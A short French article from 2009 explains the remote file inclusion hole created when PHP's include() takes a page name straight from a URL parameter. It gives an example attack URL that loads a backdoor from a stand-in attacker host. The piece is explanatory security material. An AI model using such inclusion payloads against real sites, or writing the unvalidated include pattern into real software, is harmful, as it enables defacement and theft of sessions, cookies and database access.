Cette article a été consulté 4771 fois.
La fonction include() de PHP, permet d'intégrer une page dans un site web
Exemple (page: index.php) : C'est très pratique, puisque il est possible d'inclure n'importe quel page, ce qui permet d'aller bien plus vite !
Comme ceci : http://son_site.fr/index.php?page=welcome.php
Mais ce code contient une énorme faille de sécurité, puisque n'importe qui pourrait faire ceci : http://son_site.fr/index.php?page=http://google.fr
Mais on peut également intégrer ~une porte dérobée : http://son_site.fr/index.php?page=http://le_site_du_hacker.com/backdoor/backdoor_1213.php
Ce qui aura pour conséquence de défacer le site par exemple ! ou de récupérer des informations via les sessions, cookie, connexion à la BDD...
Article écrit par
Clint le 02/12/2009, sous license
Signature de l'auteur : « trop de paroles noient la vérité »
